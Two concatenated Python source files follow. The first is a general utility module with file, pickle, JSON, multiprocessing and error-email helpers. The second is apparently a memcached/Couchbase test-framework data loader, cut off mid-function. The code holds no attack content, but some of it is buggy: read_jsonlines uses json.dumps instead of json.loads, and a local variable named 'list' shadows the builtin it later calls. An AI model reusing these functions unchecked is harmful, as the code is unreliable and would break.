def date_versioned_dir(dst: Path) -> Path:
"""Make directory with name of current date in destination directory and return it"""
versioned_dir = dst / str(datetime.now().date())
versioned_dir.mkdir(exist_ok=True, parents=True)
return versioned_dir
def next_fname(path: PathOrStr) -> Path:
"""return next incremental file that does not exist (path.root)_{next_num}.(path.suffix)"""
path = Path(path)
parent, stem, suffix = path.parent, path.stem, path.suffix
i = 0
while (parent / f'{stem}_{i:02}{suffix}').exists():
i += 1
return parent / f'{stem}_{i:02}{suffix}'
def extend_path_name(path: OptPathOrStr, ext: str) -> Optional[Path]:
"""concat string to the end of the path name but before the suffix"""
return path.parent / (f'{path.stem}_{ext}{path.suffix}') if path else None
@log_input()
def write_pickle(obj, path: PathOrStr) -> None:
"""write object to a pickle on your computer"""
path = Path(path)
with path.open('wb') as f:
pickle.dump(obj, f)
@log_output()
def read_pickle(path: PathOrStr):
"""return stored object from a pickle file"""
path = Path(path)
logger.info(f'reading pickle: {path}')
with path.open('rb') as f:
obj = pickle.load(f)
return obj
def write_json(obj, path: PathOrStr) -> None:
"""write object as json"""
path = Path(path)
with path.open('w') as f:
json.dump(obj, f)
def read_json(path: PathOrStr) -> Union[List, Dict]:
"""return stored object from a json file"""
path = Path(path)
with path.open() as f:
obj = json.load(f)
return obj
def read_jsonlines(filename: str) -> List[str]:
"""read a json lines file as a list of dictionaries"""
data = []
with open(filename, 'r') as f:
for line in f:
data.append(json.dumps(line))
return data
def write_iterables(seq: Sequence[Sequence], path: Path):
with path.open('w') as f:
wr = csv.writer(f, delimiter=" ")
wr.writerows(seq)
def input_polar(msg, default='y'):
"""get a polar input from user"""
prompt = f'{msg}: [{default}]: '
while True:
user_input: str = input(prompt).lower()
if user_input == '':
return default
elif user_input not in ['y', 'n']:
print('Error: choose y or n')
continue
else:
break
return user_input
def input_text(msg, default):
"""get a text input from user. Prompt example=msg: [default]: """
prompt = f'{msg}: [{default}]: '
while True:
user_input: str = input(prompt).strip()
if user_input == '':
return default
else:
break
return user_input
def input_num_index(msg: str, choices: Dict[str, str], default='0') -> str:
"""get a numerical index from user"""
num_index = list(choices.keys())
num_index_comma_sep = ", ".join(num_index)
choice_str = '\n'.join([f'{index} - {option}' for index, option in choices.items()]) + '\n'
instruction = f'Choose from {num_index_comma_sep} [{default}]:'
prompt = f'{msg}:\n' + choice_str + instruction
while True:
user_index = input(prompt)
if user_index == '':
return default
elif user_index not in num_index:
print(f'Error: choose from {num_index_comma_sep}')
continue
else:
break
return user_index
# multi-processing/threading tools #####################################################################################
@timer
def multiproc_iter(iterable: Sequence, func: Callable, n_chunks: int = 16) -> List:
"""
process a sequence as batches on multiple cpus ie in parallel. Note is cpu utilisation drop and the
function is still handing there is probably an error in func.
Args:
iterable: item to be processed
func: callable applied to each chunk
n_chunks: number of chunk iterable will be split into
Returns:
iterable mapped by func
"""
logger.info(f'starting multi-processing with: {func.__name__}')
size = len(iterable) // n_chunks
chunks = chunkify(iterable, size)
with ProcessPoolExecutor(max_workers=os.cpu_count()) as e:
result = e.map(func, list(chunks))
return [item for chunk in result for item in chunk]
def multi_proc_progress(iterable: Sequence, func: Callable, n_chunks: int = 16) -> List:
logger.info(f'starting multi-processing with: {func.__name__}')
size = len(iterable) // n_chunks
chunks = chunkify(iterable, size)
with ProcessPoolExecutor(max_workers=os.cpu_count()) as ex:
futures = [ex.submit(func, chunk) for chunk in chunks]
results = []
for f in tqdm(as_completed(futures), total=n_chunks):
results.append(f.result())
return [item for chunk in tqdm(results) for item in chunk]
stop_threads: bool = False
def terminal_timer(refresh_period: float = 1) -> None:
"""periodically log time elapsed to the terminal, this function is intended to be run as a thread which can
be ended safely by updating a global flag."""
start = time.time()
global stop_threads
while not stop_threads:
time.sleep(refresh_period)
secs_elapsed = int(time.time() - start)
logger.info(f'time elapsed: {hr_secs(secs_elapsed)}')
logger.info('timer thread ended.')
stop_threads = False
def run_with_terminal_timer(refresh_period: float = 1):
"""
decorator that periodically prints the time elapsed during the decorated functions runtime. It does this by starting
a timer in a separate thread, the thread is ended safely then the decorated function finishes.
Args:
refresh_period: how often timer prints to terminal in seconds
"""
def outer_wrapper(func):
@functools.wraps(func)
def inner_wrapper(*args, **kwargs):
thread = Thread(target=terminal_timer, args=(refresh_period,))
thread.start()
result = func(*args, **kwargs)
global stop_threads
stop_threads = True
return result
return inner_wrapper
return outer_wrapper
def server_request(query: str):
print(f'starting: {query}')
time.sleep(random.randint(5, 8))
print(f'completed: {query}')
return [random.randint(1, 10) for _ in range(10)]
def async_sql_queries(queries: Union[List, Tuple], max_workers: int = 3, refresh_period: int = 1):
"""make and return the output of asynchronous sql requests with timer"""
global stop_threads
data: List = []
thread_timer = Thread(target=terminal_timer, args=(refresh_period,))
with ThreadPoolExecutor(max_workers=max_workers) as executor:
results = [executor.submit(server_request, query) for query in queries]
thread_timer.start()
for f in as_completed(results):
data.append(f.result())
stop_threads = True
return data
# operating system #####################################################################################################
def get_size_hr(obj: Any) -> str:
"""get object size in human readable format"""
return hr_bytes(sys.getsizeof(obj))
def py_process_memory() -> str:
"""get memory consumption of current python process in human readable format"""
process = psutil.Process(os.getpid())
return hr_bytes(process.memory_info().rss)
# memory & runtime tools ###############################################################################################
def show_vars(*args):
"""Print an arbitrary number of variable names with their assigned value. Iterate over all global variables until
it finds ones with a matching memory reference."""
pairs = {k: v for k, v in globals().items() if id(v) in map(id, args)}
print(pairs)
def var_nm(var: Any) -> str:
"""return the variable name of any object as a string"""
return [k for k, v in globals().items() if id(var) == id(v)][0]
if __name__ == '__main__':
pass
# errors / tracebacks ##################################################################################################
def make_error_log() -> str:
"""if called once an exception has been raised This function returns a string error log (including type,
msg and traceback)"""
ex_type, ex_value, ex_traceback = sys.exc_info()
trace_back = traceback.extract_tb(ex_traceback)
stack_trace = [f"File : {tr[0]} , Line : {tr[1]}, Func.Name : {tr[2]}, Message : {tr[3]}" for tr in trace_back]
stack_trace = '\n\t'.join(stack_trace)
error_log: str = (f"Exception type: {ex_type.__name__}\n"
f"Exception message: {ex_value}\n"
f"Stack trace:\n\t {stack_trace}")
return error_log
# emails ###############################################################################################################
def send_email(to: str, subject: str, body: str) -> None:
"""send a text email to a passed email address. the sender email address is sourced from an
environment variable"""
address = os.environ['EMAIL_ADDRESS']
msg = EmailMessage()
msg['From'] = address
msg['To'] = to
msg['Subject'] = subject
msg.set_content(body)
# msg.add_attachment(df.to_csv(index=False), filename='data.csv')
# add a text file attachment
with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:
smtp.login(address, os.environ['EMAIL_PASSWORD'])
smtp.send_message(msg)
def send_error_log_email(to: str) -> None:
"""
If an exception is raised send an error log message to param email
example
-------
try:
def app():
something
app()
except Exception as e:
error_log = montk.make_error_log()
montk.send_error_log_email(to=os.environ['EMAIL_ADDRESS'])
"""
error_log = make_error_log()
send_email(to=to, subject=f'Error in app: {Path(__file__).name}', body=error_log)
# monkey patching standard library classes #############################################################################
Path.ls = lambda self: list(self.iterdir())
|
data_helper.py
|
import copy
import socket
from multiprocessing.process import BaseProcess as Process
from multiprocessing.queues import Queue
import random
import time
from random import Random
import uuid
from TestInput import TestInputServer
from TestInput import TestInputSingleton
import logger
import zlib
import crc32
import hashlib
import threading
from mc_bin_client import MemcachedClient, MemcachedError
from mc_ascii_client import MemcachedAsciiClient
from memcached.helper.old_kvstore import ClientKeyValueStore
from membase.api.rest_client import RestConnection, RestHelper, Bucket, vBucket
from memcacheConstants import ERR_NOT_FOUND, ERR_NOT_MY_VBUCKET, ERR_ETMPFAIL, ERR_EINVAL, ERR_2BIG
import json
import sys
from perf_engines import mcsoda
import memcacheConstants
import server_ports
from queue import Queue
from threading import Thread
log = logger.Logger.get_logger()
try:
import concurrent.futures
except ImportError:
log.warning("{0} {1}".format("Can not import concurrent module.",
"Data for each server will be loaded/retrieved sequentially"))
class MemcachedClientHelperExcetion(Exception):
def __init__(self, errorcode, message):
Exception.__init__(self, errorcode, message)
self._message = message
self.errorcode = errorcode
self._args = (errorcode, message)
class MemcachedClientHelper(object):
# value_sizes {10:0.1,20:0.2:40:0.8}
@staticmethod
def create_threads(servers=None,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True,
async_write=False,
delete_ratio=0,
expiry_ratio=0,
collection=None):
log = logger.Logger.get_logger()
if not servers:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="servers is not set")
if ram_load_ratio < 0 and number_of_items < 0:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="ram_load_ratio or number_of_items must be specified")
if not value_size_distribution:
value_size_distribution = {16: 0.25, 128: 0.25, 512: 0.25, 1024: 0.25}
list = []
if ram_load_ratio >= 0:
info = RestConnection(servers[0]).get_bucket(name)
emptySpace = info.stats.ram - info.stats.memUsed
space_to_fill = (int((emptySpace * ram_load_ratio) / 100.0))
log.info('space_to_fill : {0}, emptySpace : {1}'.format(space_to_fill, emptySpace))
for size, probability in list(value_size_distribution.items()):
how_many = int(space_to_fill / (size + 250) * probability)
payload_generator = DocumentGenerator.make_docs(number_of_items,
{"name": "user-${prefix}", "payload": "memcached-json-${prefix}-${padding}",
"size": size, "seed": str(uuid.uuid4())})
list.append({'size': size, 'value': payload_generator, 'how_many': how_many})
else:
for size, probability in value_size_distribution.items():
how_many = ((number_of_items // number_of_threads) * probability)
payload_generator = DocumentGenerator.make_docs(number_of_items,
{"name": "user-${prefix}", "payload": "memcached-json-${prefix}-${padding}",
"size": size, "seed": str(uuid.uuid4())})
list.append({'size': size, 'value': payload_generator, 'how_many': how_many})
for item in list:
item['how_many'] //= int(number_of_threads)
# at least one element for each value size
if item['how_many'] < 1:
item['how_many'] = 1
msg = "each thread will send {0} items with value of size : {1}"
log.info(msg.format(item['how_many'], item['size']))
threads = []
for i in range(0, int(number_of_threads)):
# choose one of the servers random
thread = WorkerThread(serverInfo=MemcachedClientHelper.random_pick(servers),
name=name,
values_list=list,
override_vBucketId=override_vBucketId,
write_only=write_only,
moxi=moxi,
async_write=async_write,
delete_ratio=delete_ratio,
expiry_ratio=expiry_ratio,
collection=collection)
threads.append(thread)
return threads
@staticmethod
def create_threads_for_load_bucket(serverInfo=None,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True,
delete_ratio=0,
expiry_ratio=0,
collection=None):
log = logger.Logger.get_logger()
if not serverInfo:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="serverInfo is not set")
if ram_load_ratio < 0 and number_of_items < 0:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="ram_load_ratio or number_of_items must be specified")
if not value_size_distribution:
value_size_distribution = {16: 0.33, 128: 0.33, 1024: 0.33}
list = []
if ram_load_ratio >= 0:
info = RestConnection(serverInfo).get_bucket(name)
emptySpace = info.stats.ram - info.stats.memUsed
space_to_fill = (int((emptySpace * ram_load_ratio) / 100.0))
log.info('space_to_fill : {0}, emptySpace : {1}'.format(space_to_fill, emptySpace))
for size, probability in list(value_size_distribution.items()):
# let's assume overhead per key is 64 bytes ?
how_many = int(space_to_fill / (size + 250) * probability)
payload = MemcachedClientHelper.create_value('*', size)
list.append({'size': size, 'value': payload, 'how_many': how_many})
else:
for size, probability in list(value_size_distribution.items()):
how_many = (number_of_items * probability)
payload = MemcachedClientHelper.create_value('*', size)
list.append({'size': size, 'value': payload, 'how_many': how_many})
for item in list:
item['how_many'] //= int(number_of_threads)
# at least one element for each value size
if item['how_many'] < 1:
item['how_many'] = 1
msg = "each thread will send {0} items with value of size : {1}"
log.info(msg.format(item['how_many'], item['size']))
threads = []
for i in range(0, int(number_of_threads)):
thread = WorkerThread(serverInfo=serverInfo,
name=name,
values_list=list,
override_vBucketId=override_vBucketId,
write_only=write_only,
moxi=moxi,
delete_ratio=delete_ratio,
expiry_ratio=expiry_ratio,
collection=collection)
threads.append(thread)
return threads
@staticmethod
def load_bucket_and_return_the_keys(servers=None,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True,
delete_ratio=0,
expiry_ratio=0,
collection=None):
inserted_keys = []
rejected_keys = []
log = logger.Logger.get_logger()
threads = MemcachedClientHelper.create_threads(servers,
name,
ram_load_ratio,
number_of_items,
value_size_distribution,
number_of_threads,
override_vBucketId,
write_only=write_only,
moxi=moxi,
delete_ratio=delete_ratio,
expiry_ratio=expiry_ratio,
collection=collection)
# we can start them!
for thread in threads:
thread.start()
log.info("waiting for all worker thread to finish their work...")
[thread.join() for thread in threads]
log.info("worker threads are done...")
inserted_count = 0
rejected_count = 0
deleted_count = 0
expired_count = 0
for thread in threads:
t_inserted, t_rejected = thread.keys_set()
inserted_count += thread.inserted_keys_count()
rejected_count += thread.rejected_keys_count()
deleted_count += thread._delete_count
expired_count += thread._expiry_count
inserted_keys.extend(t_inserted)
rejected_keys.extend(t_rejected)
msg = "inserted keys count : {0} , rejected keys count : {1}"
log.info(msg.format(inserted_count, rejected_count))
msg = "deleted keys count : {0} , expired keys count : {1}"
log.info(msg.format(deleted_count, expired_count))
return inserted_keys, rejected_keys
@staticmethod
def load_bucket(servers,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True,
collection=None):
inserted_keys_count = 0
rejected_keys_count = 0
log = logger.Logger.get_logger()
threads = MemcachedClientHelper.create_threads(servers,
name,
ram_load_ratio,
number_of_items,
value_size_distribution,
number_of_threads,
override_vBucketId,
write_only,
moxi,
collection=collection)
# we can start them!
for thread in threads:
thread.start()
log.info("waiting for all worker thread to finish their work...")
[thread.join() for thread in threads]
log.info("worker threads are done...")
for thread in threads:
inserted_keys_count += thread.inserted_keys_count()
rejected_keys_count += thread.rejected_keys_count()
msg = "inserted keys count : {0} , rejected keys count : {1}"
log.info(msg.format(inserted_keys_count, rejected_keys_count))
return inserted_keys_count, rejected_keys_count
@staticmethod
def create_value(pattern, size):
return (pattern * (size // len(pattern))) + pattern[0:(size % len(pattern))]
@staticmethod
def random_pick(list):
if list:
if len(list) > 1:
return list[Random().randint(0, len(list) - 1)]
return list[0]
# raise array empty ?
return None
@staticmethod
def direct_client(server, bucket, timeout=30, admin_user='cbadminbucket',admin_pass='password'):
log = logger.Logger.get_logger()
rest = RestConnection(server)
node = None
try:
node = rest.get_nodes_self()
except ValueError as e:
log.info("could not connect to server {0}, will try scanning all nodes".format(server))
if not node:
nodes = rest.get_nodes()
for n in nodes:
if n.ip == server.ip and n.port == server.port:
node = n
if isinstance(server, dict):
log.info("dict:{0}".format(server))
log.info("creating direct client {0}:{1} {2}".format(server["ip"], node.memcached, bucket))
else:
log.info("creating direct client {0}:{1} {2}".format(server.ip, node.memcached, bucket))
RestHelper(rest).vbucket_map_ready(bucket, 60)
vBuckets = RestConnection(server).get_vbuckets(bucket)
if isinstance(server, dict):
client = MemcachedClient(server["ip"], node.memcached, timeout=timeout)
else:
client = MemcachedClient(server.ip, node.memcached, timeout=timeout)
if vBuckets != None:
client.vbucket_count = len(vBuckets)
else:
client.vbucket_count = 0
bucket_info = rest.get_bucket(bucket)
# todo raise exception for not bucket_info
cluster_compatibility = rest.check_cluster_compatibility("5.0")
if cluster_compatibility is None:
pre_spock = True
else:
pre_spock = not cluster_compatibility
if pre_spock:
log.info("Atleast 1 of the server is on pre-spock "
"version. Using the old ssl auth to connect to "
"bucket.")
client.sasl_auth_plain(bucket_info.name.encode('ascii'),
bucket_info.saslPassword.encode('ascii'))
else:
if isinstance(bucket, Bucket):
bucket = bucket.name
bucket = bucket.encode('ascii')
client.sasl_auth_plain(admin_user, admin_pass)
client.bucket_select(bucket)
return client
@staticmethod
def proxy_client(server, bucket, timeout=30, force_ascii=False, standalone_moxi_port=None):
# for this bucket on this node what is the proxy ?
rest = RestConnection(server)
log = logger.Logger.get_logger()
bucket_info = rest.get_bucket(bucket)
nodes = bucket_info.nodes
if (TestInputSingleton.input and "ascii" in TestInputSingleton.input.test_params \
and TestInputSingleton.input.test_params["ascii"].lower() == "true")\
or force_ascii:
ascii = True
else:
ascii = False
for node in nodes:
RestHelper(rest).vbucket_map_ready(bucket, 60)
vBuckets = rest.get_vbuckets(bucket)
port_moxi = standalone_moxi_port or node.memcached
if ascii:
log = logger.Logger.get_logger()
log.info("creating ascii client {0}:{1} {2}".format(server.ip, port_moxi, bucket))
client = MemcachedAsciiClient(server.ip, port_moxi, timeout=timeout)
else:
log = logger.Logger.get_logger()
if isinstance(server, dict):
log.info("creating proxy client {0}:{1} {2}".format(server["ip"], port_moxi, bucket))
client = MemcachedClient(server["ip"], port_moxi, timeout=timeout)
else:
log.info("creating proxy client {0}:{1} {2}".format(server.ip, port_moxi, bucket))
client = MemcachedClient(server.ip, port_moxi, timeout=timeout)
client.vbucket_count = len(vBuckets)
if bucket_info.authType == "sasl":
client.sasl_auth_plain(bucket_info.name,
bucket_info.saslPassword)
return client
if isinstance(server, dict):
raise Exception("unable to find {0} in get_nodes()".format(server["ip"]))
else:
raise Exception("unable to find {0} in get_nodes()".format(server.ip))
@staticmethod
def standalone_moxi_client(server, bucket, timeout=30, moxi_port=None):
log = logger.Logger.get_logger()
if isinstance(server, dict):
log.info("creating proxy client {0}:{1} {2}".format(server["ip"], moxi_port, bucket.name))
client = MemcachedClient(server["ip"], moxi_port, timeout=timeout)
else:
log.info("creating proxy client {0}:{1} {2}".format(server.ip, moxi_port, bucket.name))
client = MemcachedClient(server.ip, moxi_port, timeout=timeout)
if bucket.name != 'default' and bucket.authType == "sasl":
client.sasl_auth_plain(bucket.name.encode('ascii'),
bucket.saslPassword.encode('ascii'))
return client
if isinstance(server, dict):
raise Exception("unable to find {0} in get_nodes()".format(server["ip"]))
else:
raise Exception("unable to find {0} in get_nodes()".format(server.ip))
@staticmethod
def flush_bucket(server, bucket, admin_user='cbadminbucket',admin_pass='password'):
# if memcached throws OOM error try again ?
log = logger.Logger.get_logger()
retry_attempt = 5
while retry_attempt > 0:
client = MemcachedClientHelper.direct_client(server, bucket, admin_user=admin_user, admin_pass=admin_pass)
try:
client.flush()
log.info('flushed bucket {0}...'.format(bucket))
break
except MemcachedError:
retry_attempt -= 1
log.info('flush raised memcached error trying again in 5 seconds...')
time.sleep(5)
finally:
client.close()
return
class MutationThread(threading.Thread):
def run(self, collection=None):
values = DocumentGenerator.make_docs(len(self.keys),
{"name": "user-${prefix}", "payload": "memcached-json-${prefix}-${padding}",
"size": 1024, "seed": self.seed})
client = MemcachedClientHelper.proxy_client(self.serverInfo, self.name)
counter = 0
for value in values:
try:
if self.op == "set":
client.set(self.keys[counter], 0, 0, value, collection=collection)
self._mutated_count += 1
except MemcachedError:
self._rejected_count += 1
self._rejected_keys.append({"key": self.keys[counter], "value": value})
except Exception as e:
self.log.info("unable to mutate {0} due to {1}".format(self.keys[counter], e))
self._rejected_count += 1
self._rejected_keys.append({"key": self.keys[counter], "value": value})
client.close()
client = MemcachedClientHelper.proxy_client(self.serverInfo, self.name)
counter = counter + 1
self.log.info("mutation failed {0} times".format(self._rejected_count))
client.close()
def __init__(self, serverInfo,
keys,
op,
seed,
name='default',
collection=None):
threading.Thread.__init__(self)
self.log = logger.Logger.get_logger()
self.serverInfo = serverInfo
self.name = name
self.collection=collection
self.keys = keys
self.op = op
self.seed = seed
self._mutated_count = 0
self._rejected_count = 0
self._rejected_keys = []
class ReaderThread(object):
def __init__(self, info, keyset, queue, collection=None):
self.info = info
self.log = logger.Logger.get_logger()
self.error_seen = 0
self.keyset = keyset
self.aborted = False
self.queue = queue
self.collection=collection
def abort(self):
self.aborted = True
def _saw_error(self, key):
# error_msg = "unable to get key {0}"
self.error_seen += 1
# if self.error_seen < 500:
# self.log.error(error_msg.format(key))
def start(self):
client = MemcachedClientHelper.direct_client(self.info["server"], self.info['name'], admin_user='cbadminbucket',
admin_pass='password')
time.sleep(5)
while self.queue.empty() and self.keyset:
selected = MemcachedClientHelper.random_pick(self.keyset)
selected['how_many'] -= 1
if selected['how_many'] < 1:
self.keyset.remove(selected)
key = "{0}-{1}-{2}".format(self.info['baseuuid'],
selected['size'],
int(selected['how_many']))
try:
client.send_get(key, self.collection)
except Exception:
self._saw_error(key)
# self.log.warning("attempted to get {0} keys before they are set".format(self.error_seen))
client.close()
# mutation ? let' do two cycles , first run and then try to mutate all those itesm
# and return
class WorkerThread(threading.Thread):
# too flags : stop after x errors
# slow down after every seeing y errors
# value_list is a list of document generators
def __init__(self,
serverInfo,
name,
values_list,
ignore_how_many_errors=5000,
override_vBucketId=-1,
terminate_in_minutes=120,
write_only=False,
moxi=True,
async_write=False,
delete_ratio=0,
expiry_ratio=0,
collection=None):
threading.Thread.__init__(self)
self.log = logger.Logger.get_logger()
self.serverInfo = serverInfo
self.name = name
self.collection=collection
self.values_list = []
self.values_list.extend(copy.deepcopy(values_list))
self._value_list_copy = []
self._value_list_copy.extend(copy.deepcopy(values_list))
self._inserted_keys_count = 0
self._rejected_keys = []
self._rejected_keys_count = 0
self._delete_ratio = delete_ratio
self._expiry_ratio = expiry_ratio
self._delete_count = 0
self._expiry_count = 0
self._delete = []
self.ignore_how_many_errors = ignore_how_many_errors
self.override_vBucketId = override_vBucketId
self.terminate_in_minutes = terminate_in_minutes
self._base_uuid = uuid.uuid4()
self.queue = Queue()
self.moxi = moxi
# let's create a read_thread
self.info = {'server': serverInfo,
'name': self.name,
'baseuuid': self._base_uuid,
'collection': self.collection}
self.write_only = write_only
self.aborted = False
self.async_write = async_write
def inserted_keys_count(self):
return self._inserted_keys_count
def rejected_keys_count(self):
return self._rejected_keys_count
# smart functin that gives you sth you can use to
# get inserted keys
# we should just expose an iterator instead which
# generates the key,values on fly
def keys_set(self):
# let's construct the inserted keys set
# TODO: hard limit , let's only populated up to 1 million keys
inserted_keys = []
for item in self._value_list_copy:
for i in range(0, (int(item['how_many']))):
key = "{0}-{1}-{2}".format(self._base_uuid, item['size'], i)
if key not in self._rejected_keys:
inserted_keys.append(key)
if len(inserted_keys) > 2 * 1024 * 1024:
break
return inserted_keys, self._rejected_keys
def run(self):
msg = "starting a thread to set keys mixed set-get ? {0} and using async_set ? {1}"
msg += " with moxi ? {2}"
msg = msg.format(self.write_only, self.async_write, self.moxi)
self.log.info(msg)
try:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
client = None
if self.moxi:
client = MemcachedClientHelper.proxy_client(self.serverInfo, self.name)
except Exception as ex:
self.log.info("unable to create memcached client due to {0}. stop thread...".format(ex))
import traceback
traceback.print_exc()
return
# keeping keys in the memory is not such a good idea because
# we run out of memory so best is to just keep a counter ?
# if someone asks for the keys we can give them the formula which is
# baseuuid-{0}-{1} , size and counter , which is between n-0 except those
# keys which were rejected
# let's print out some status every 5 minutes..
if not self.write_only:
self.reader = Process(target=start_reader_process, args=(self.info, self._value_list_copy, self.queue))
self.reader.start()
start_time = time.time()
last_reported = start_time
backoff_count = 0
while len(self.values_list) > 0 and not self.aborted:
selected = MemcachedClientHelper.random_pick(self.values_list)
selected['how_many'] -= 1
if selected['how_many'] < 1:
self.values_list.remove(selected)
if (time.time() - start_time) > self.terminate_in_minutes * 60:
self.log.info("its been more than {0} minutes loading data. stopping the process..".format(
self.terminate_in_minutes))
break
else:
# every two minutes print the status
if time.time() - last_reported > 2 * 60:
if not self.moxi:
awareness.done()
try:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
except Exception:
# vbucket map is changing . sleep 5 seconds
time.sleep(5)
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
self.log.info("now connected to {0} memcacheds".format(len(awareness.memcacheds)))
last_reported = time.time()
for item in self.values_list:
self.log.info(
'{0} keys (each {1} bytes) more to send...'.format(item['how_many'], item['size']))
key = "{0}-{1}-{2}".format(self._base_uuid,
selected['size'],
int(selected['how_many']))
if not self.moxi:
client = awareness.memcached(key)
if not client:
self.log.error("client should not be null")
value = "*"
try:
value = next(selected["value"])
except StopIteration:
pass
try:
if self.override_vBucketId >= 0:
client.vbucketId = self.override_vBucketId
if self.async_write:
client.send_set(key, 0, 0, value, self.collection)
else:
client.set(key, 0, 0, value, self.collection)
self._inserted_keys_count += 1
backoff_count = 0
# do expiry sets, 30 second expiry time
if Random().random() < self._expiry_ratio:
client.set(key + "-exp", 30, 0, value, self.collection)
self._expiry_count += 1
# do deletes if we have 100 pending
# at the end delete the remaining
if len(self._delete) >= 100:
# self.log.info("deleting {0} keys".format(len(self._delete)))
for key_del in self._delete:
client.delete(key_del, self.collection)
self._delete = []
# do delete sets
if Random().random() < self._delete_ratio:
client.set(key + "-del", 0, 0, value, self.collection)
self._delete.append(key + "-del")
self._delete_count += 1
except MemcachedError as error:
if not self.moxi:
awareness.done()
try:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
except Exception:
# vbucket map is changing . sleep 5 seconds
time.sleep(5)
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
self.log.info("now connected to {0} memcacheds".format(len(awareness.memcacheds)))
if isinstance(self.serverInfo, dict):
self.log.error(
"memcached error {0} {1} from {2}".format(error.status, error.msg, self.serverInfo["ip"]))
else:
self.log.error(
"memcached error {0} {1} from {2}".format(error.status, error.msg, self.serverInfo.ip))
if error.status == 134:
backoff_count += 1
if backoff_count < 5:
backoff_seconds = 15 * backoff_count
else:
backoff_seconds = 2 * backoff_count
self.log.info("received error # 134. backing off for {0} sec".format(backoff_seconds))
time.sleep(backoff_seconds)
self._rejected_keys_count += 1
self._rejected_keys.append({"key": key, "value": value})
if len(self._rejected_keys) > self.ignore_how_many_errors:
break
except Exception as ex:
if not self.moxi:
awareness.done()
try:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
except Exception:
awareness = VBucketAwareMemcached(RestConnection(self.serverInfo), self.name)
self.log.info("now connected to {0} memcacheds".format(len(awareness.memcacheds)))
if isinstance(self.serverInfo, dict):
self.log.error("error {0} from {1}".format(ex, self.serverInfo["ip"]))
import traceback
traceback.print_exc()
else:
self.log.error("error {0} from {1}".format(ex, self.serverInfo.ip))
self._rejected_keys_count += 1
self._rejected_keys.append({"key": key, "value": value})
if len(self._rejected_keys) > self.ignore_how_many_errors:
break
# before closing the session let's try sending those items again
retry = 3
while retry > 0 and self._rejected_keys_count > 0:
rejected_after_retry = []
self._rejected_keys_count = 0
for item in self._rejected_keys:
try:
if self.override_vBucketId >= 0:
client.vbucketId = self.override_vBucketId
if self.async_write:
client.send_set(item["key"], 0, 0, item["value"], self.collection)
else:
client.set(item["key"], 0, 0, item["value"], self.collection)
self._inserted_keys_count += 1
except MemcachedError:
self._rejected_keys_count += 1
rejected_after_retry.append({"key": item["key"], "value": item["value"]})
if len(rejected_after_retry) > self.ignore_how_many_errors:
break
self._rejected_keys = rejected_after_retry
retry = -1
# clean up the rest of the deleted keys
if len(self._delete) > 0:
# self.log.info("deleting {0} keys".format(len(self._delete)))
for key_del in self._delete:
client.delete(key_del, self.collection)
self._delete = []
self.log.info("deleted {0} keys".format(self._delete_count))
self.log.info("expiry {0} keys".format(self._expiry_count))
# client.close()
awareness.done()
if not self.write_only:
self.queue.put_nowait("stop")
self.reader.join()
def _initialize_memcached(self):
pass
def _set(self):
pass
def _handle_error(self):
pass
# if error is memcached error oom related let's do a sleep
def _time_to_stop(self):
return self.aborted or len(self._rejected_keys) > self.ignore_how_many_errors
class VBucketAwareMemcached(object):
def __init__(self, rest, bucket, info=None, collection=None):
self.log = logger.Logger.get_logger()
self.info = info
self.bucket = bucket
if isinstance(bucket, Bucket):
self.bucket = bucket.name
self.memcacheds = {}
self.vBucketMap = {}
self.vBucketMapReplica = {}
self.rest = rest
self.reset(rest)
self.collections=collection
def reset(self, rest=None):
if not rest:
self.rest = RestConnection(self.info)
m, v, r = self.request_map(self.rest, self.bucket)
self.memcacheds = m
self.vBucketMap = v
self.vBucketMapReplica = r
def reset_vbuckets(self, rest, vbucketids_set, forward_map=None, admin_user='cbadminbucket',admin_pass='password'):
if not forward_map:
forward_map = rest.get_bucket(self.bucket, num_attempt=2).forward_map
if not forward_map:
self.reset(rest)
forward_map = rest.get_vbuckets(self.bucket)
nodes = rest.get_nodes()
for vBucket in forward_map:
if vBucket.id in vbucketids_set:
self.vBucketMap[vBucket.id] = vBucket.master
masterIp = vBucket.master.rsplit(":", 1)[0]
masterPort = int(vBucket.master.rsplit(":", 1)[1])
if self.vBucketMap[vBucket.id] not in self.memcacheds:
server = TestInputServer()
server.rest_username = rest.username
server.rest_password = rest.password
for node in nodes:
if node.ip == masterIp and node.memcached == masterPort:
server.port = node.port
server.ip = masterIp
self.log.info("Received forward map, reset vbucket map, new direct_client")
self.memcacheds[vBucket.master] = MemcachedClientHelper.direct_client(server, self.bucket,
admin_user=admin_user, admin_pass=admin_pass)
# if no one is using that memcached connection anymore just close the connection
used_nodes = {self.vBucketMap[vb_name] for vb_name in self.vBucketMap}
rm_clients = []
for memcache_con in self.memcacheds:
if memcache_con not in used_nodes:
rm_clients.append(memcache_con)
for rm_cl in rm_clients:
self.memcacheds[rm_cl].close()
del self.memcacheds[rm_cl]
self.vBucketMapReplica[vBucket.id] = vBucket.replica
for replica in vBucket.replica:
self.add_memcached(replica, self.memcacheds, self.rest, self.bucket)
return True
def request_map(self, rest, bucket):
memcacheds = {}
vBucketMap = {}
vBucketMapReplica = {}
vb_ready = RestHelper(rest).vbucket_map_ready(bucket, 60)
if not vb_ready:
raise Exception("vbucket map is not ready for bucket {0}".format(bucket))
vBuckets = rest.get_vbuckets(bucket)
for vBucket in vBuckets:
